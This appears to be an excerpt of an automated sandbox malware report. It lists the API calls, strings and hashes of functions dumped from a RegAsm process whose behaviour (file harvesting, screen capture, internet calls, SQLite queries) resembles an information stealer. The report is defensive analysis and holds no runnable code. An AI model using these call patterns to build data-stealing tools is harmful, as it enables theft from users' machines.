Instruction ID: 500d7c88a2085726728d35326e6952772f3e0e38a46ae67bbb90ee8c45411e9d
Opcode Fuzzy Hash: ade7fe7f8a5f33038c24079659326912bd14c3b07ed2e307a062eb76aaeffcf7
Instruction Fuzzy Hash: 53915EB1D0024CEADF15EBE5D952BDEBBB8AF18308F50417EE40573282DA78570C8B66

Function 00410D21 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
Instruction ID: 14537dfbc9dced5e712fe60e3e3a31c8263f1f5987e60415cd97e08317604fbc
Opcode Fuzzy Hash: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
Instruction Fuzzy Hash: 27F01C7990014CBBDB51DB64C8909EDB7FDEBC4704F0091A6A90593280D6349F459B50

Function 00410D6D Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
Instruction ID: 7dcd19726911a1004ec6e1e6dff555a45da34f101be8258439f6e1c6d27db954
Opcode Fuzzy Hash: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
Instruction Fuzzy Hash: AAF05C35601610DB871209599C00AE7775BABC6B10708411BDE8C8B304C5B0ECC142E0

Non-executed Functions

Function 004153F6 Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 316stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004153FB
wsprintfA.USER32 ref: 00415421
FindFirstFileA.KERNEL32(?,?), ref: 00415438
memset.MSVCRT ref: 0041544F
memset.MSVCRT ref: 0041545D
StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
wsprintfA.USER32 ref: 004154B9
StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
wsprintfA.USER32 ref: 004154F0
wsprintfA.USER32 ref: 00415504
memset.MSVCRT ref: 00415516
lstrcat.KERNEL32(?,?), ref: 00415528
strtok_s.MSVCRT ref: 00415561
memset.MSVCRT ref: 00415576
lstrcat.KERNEL32(?,?), ref: 0041558B
PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
strtok_s.MSVCRT ref: 004156E1
FindNextFileA.KERNEL32(000000FF,?), ref: 00415804
FindClose.KERNEL32(000000FF), ref: 00415815

Strings

%s\*.*, xrefs: 00415416
%s\%s, xrefs: 004154FE
%s\%s, xrefs: 004154B3
%s\%s\%s, xrefs: 004154EA

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 264515753-332874205
Opcode ID: 4ee6584d3f687e1b32e65cb83c02f27ed09cd0e3d3365d26d944eda698148e18
Instruction ID: 697dee4ec641feb1abd42be2dd66715ab0a5b9e69653565ecd0b7dc1d93a1252
Opcode Fuzzy Hash: 4ee6584d3f687e1b32e65cb83c02f27ed09cd0e3d3365d26d944eda698148e18
Instruction Fuzzy Hash: A4C170B1D0015DEEDF21EBE4DC45FDEBBBDAB08304F50406AF519A2191DB389A48CB65

Function 004162AF Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004162B4
wsprintfA.USER32 ref: 004162D4
FindFirstFileA.KERNEL32(?,?), ref: 004162EB
StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
wsprintfA.USER32 ref: 00416346
StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
wsprintfA.USER32 ref: 00416374

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

wsprintfA.USER32 ref: 00416388
PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
lstrcat.KERNEL32(?,?), ref: 004163C7
lstrcat.KERNEL32(?,00426924), ref: 004163D9
lstrcat.KERNEL32(?,?), ref: 004163E9
lstrcat.KERNEL32(?,00426928), ref: 004163FB
lstrcat.KERNEL32(?,?), ref: 0041640F
FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
FindClose.KERNEL32(00000000), ref: 004165B9

Strings

%s\*, xrefs: 004162CE
%s\%s, xrefs: 00416382
%s\%s, xrefs: 00416340

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
String ID: %s\%s$%s\%s$%s\*
API String ID: 3254224521-445461498
Opcode ID: c818c5cb1d6c25977a0651b6d84efd6ae6e2f566c7a45e53a9397c9cdd0def3f
Instruction ID: 716d461ee9032d4a9dae4af77dc79a1df6d5d6082356418533081d48ea1eca12
Opcode Fuzzy Hash: c818c5cb1d6c25977a0651b6d84efd6ae6e2f566c7a45e53a9397c9cdd0def3f
Instruction Fuzzy Hash: 34919E71D0025DABDF11EBE4DD4ABDE7BB8AF09304F4040AAF505A3191DB389748CBA5

Function 004112FD Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411302
memset.MSVCRT ref: 00411328
GetDesktopWindow.USER32 ref: 0041135E
GetWindowRect.USER32(00000000,?), ref: 0041136B
GetDC.USER32(00000000), ref: 00411372
CreateCompatibleDC.GDI32(00000000), ref: 0041137C
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
SelectObject.GDI32(00000000,00000000), ref: 00411398
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
GlobalFix.KERNEL32(?), ref: 00411412
GlobalSize.KERNEL32(?), ref: 0041141E

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4

SelectObject.GDI32(00000000,?), ref: 00411498
DeleteObject.GDI32(?), ref: 004114B3
DeleteObject.GDI32(00000000), ref: 004114BA
ReleaseDC.USER32(00000000,?), ref: 004114C4
CloseWindow.USER32(00000000), ref: 004114CB

Strings

image/jpeg, xrefs: 004113D4

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
String ID: image/jpeg
API String ID: 3067874393-3785015651
Opcode ID: a55eef0fd8014adb3fa376e1efaa6b8f1a01219b1e7a1910a617eb557450e715
Instruction ID: e481ec1d7c30d31008a5a4d171f0d2eaa52fce57a9362255ea0698d6e4794ba3
Opcode Fuzzy Hash: a55eef0fd8014adb3fa376e1efaa6b8f1a01219b1e7a1910a617eb557450e715
Instruction Fuzzy Hash: A05118B2D00218AFDF01AFE5DD499EEBFB9FF09714F10402AFA05E2160D7394A558BA5

Function 00415E66 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 201stringmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415E6B
GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
wsprintfA.USER32 ref: 00415EA2
FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
StrCmpCA.SHLWAPI(?,004268EC), ref: 00415ED6
StrCmpCA.SHLWAPI(?,004268F0), ref: 00415EF0
wsprintfA.USER32 ref: 00415F14

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00412DD7: _EH_prolog.MSVCRT ref: 00412DDC
Part of subcall function 00412DD7: memset.MSVCRT ref: 00412DFD
Part of subcall function 00412DD7: memset.MSVCRT ref: 00412E0B
Part of subcall function 00412DD7: lstrcat.KERNEL32(?,00000000), ref: 00412E37
Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E55
Part of subcall function 00412DD7: lstrcat.KERNEL32(?,?), ref: 00412E69
Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E7C
Part of subcall function 00412DD7: StrStrA.SHLWAPI(00000000), ref: 00412F16

FindNextFileA.KERNEL32(00000000,?), ref: 00416043
FindClose.KERNEL32(00000000), ref: 00416052
lstrcat.KERNEL32(?,?), ref: 00416077
lstrcat.KERNEL32(?), ref: 0041608A
lstrlenA.KERNEL32(?), ref: 00416093
lstrlenA.KERNEL32(?), ref: 004160A0

Strings

%s\*, xrefs: 00415E9C
%s\%s, xrefs: 00415F0E

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
String ID: %s\%s$%s\*
API String ID: 398052587-2848263008
Opcode ID: 151b09e7cc6d64d31bf34dbd3d91657046f67bd609d907584d0b86fb44c9cd57
Instruction ID: e4a2cc813173545a5fe5718903611597e3c30fccfebff89f3e167d8ce9cdb46d
Opcode Fuzzy Hash: 151b09e7cc6d64d31bf34dbd3d91657046f67bd609d907584d0b86fb44c9cd57
Instruction Fuzzy Hash: DB817A71D00259AFDF10EBE4DD49BEEBBB8AF19308F00407AF509A3191DB789648CB65

Function 00415AC2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415AC7
wsprintfA.USER32 ref: 00415AEA
FindFirstFileA.KERNEL32(?,?), ref: 00415B01
StrCmpCA.SHLWAPI(?,004268D4), ref: 00415B23
StrCmpCA.SHLWAPI(?,004268D8), ref: 00415B3D
lstrcat.KERNEL32(?,?), ref: 00415B72
lstrcat.KERNEL32(?), ref: 00415B85
lstrcat.KERNEL32(?,?), ref: 00415B99
lstrcat.KERNEL32(?,?), ref: 00415BA9
lstrcat.KERNEL32(?,004268DC), ref: 00415BBB
lstrcat.KERNEL32(?,?), ref: 00415BCF

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

FindNextFileA.KERNEL32(00000000,?), ref: 00415C69
FindClose.KERNEL32(00000000), ref: 00415C78

Strings

%s\%s, xrefs: 00415AE4

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 2282932919-4073750446
Opcode ID: 9640b56d2e5db0524dc20a76aa574702d320c84bf942a2365ff649777f732eac
Instruction ID: 94379aee551275b5d998bba74236b2289a82a8dc712773d574ff1e2d259f5726
Opcode Fuzzy Hash: 9640b56d2e5db0524dc20a76aa574702d320c84bf942a2365ff649777f732eac
Instruction Fuzzy Hash: 9E511D72900229ABDF11EBA1DD49EDE7B7CAF49304F0404AAE605E2151E7389789CBA5

Function 1935D9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1935DACC, 1935DE2F
API called with NULL prepared statement, xrefs: 1935DA9B, 1935DDFE
API called with finalized prepared statement, xrefs: 1935DAB0, 1935DE13
misuse, xrefs: 1935DAD6, 1935DE39
%s at line %d of [%.10s], xrefs: 1935DADB, 1935DE3E

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: b03fffe27cf4806be572353b51726684168b03aeb111d8faa89b8bba66d4d6a8
Instruction ID: 5a0c1c2b59ab697025cc5492fbf6b43c73af728635bab896610a047ad131d9c2
Opcode Fuzzy Hash: b03fffe27cf4806be572353b51726684168b03aeb111d8faa89b8bba66d4d6a8
Instruction Fuzzy Hash: A212E2B59047419BF7208F25CC49F5777E8AF49308F0C462CE8AB9B281E775F5068BA2

Function 1925B400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON

Download Yara Rule

Strings

SELECT %s ORDER BY rowid %s, xrefs: 1925B665
SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s, xrefs: 1925B696
ASC, xrefs: 1925B651, 1925B678
DESC, xrefs: 1925B656, 1925B65E, 1925B67D, 1925B685

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
API String ID: 0-3496276579
Opcode ID: dfdb4972a2d187fb05a2c58358ff8217f3712cbf03ca198c6dacad2aa79b0bf2
Instruction ID: fc43d2feecaf006cee0363474f0469bfa00e342ff005648ad60b3052632610ea
Opcode Fuzzy Hash: dfdb4972a2d187fb05a2c58358ff8217f3712cbf03ca198c6dacad2aa79b0bf2
Instruction Fuzzy Hash: 1EC136B69007429FE711CF24D9417A7B7E0FF44310F68452EE88B86690E736FA59CB91

Function 00415843 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415848
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
memset.MSVCRT ref: 004158C9
GetDriveTypeA.KERNEL32(?), ref: 004158D2
lstrcpy.KERNEL32(?,00000000), ref: 004158F2
lstrcpy.KERNEL32(?,00000000), ref: 00415910

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 004153F6: _EH_prolog.MSVCRT ref: 004153FB
Part of subcall function 004153F6: wsprintfA.USER32 ref: 00415421
Part of subcall function 004153F6: FindFirstFileA.KERNEL32(?,?), ref: 00415438
Part of subcall function 004153F6: memset.MSVCRT ref: 0041544F
Part of subcall function 004153F6: memset.MSVCRT ref: 0041545D
Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
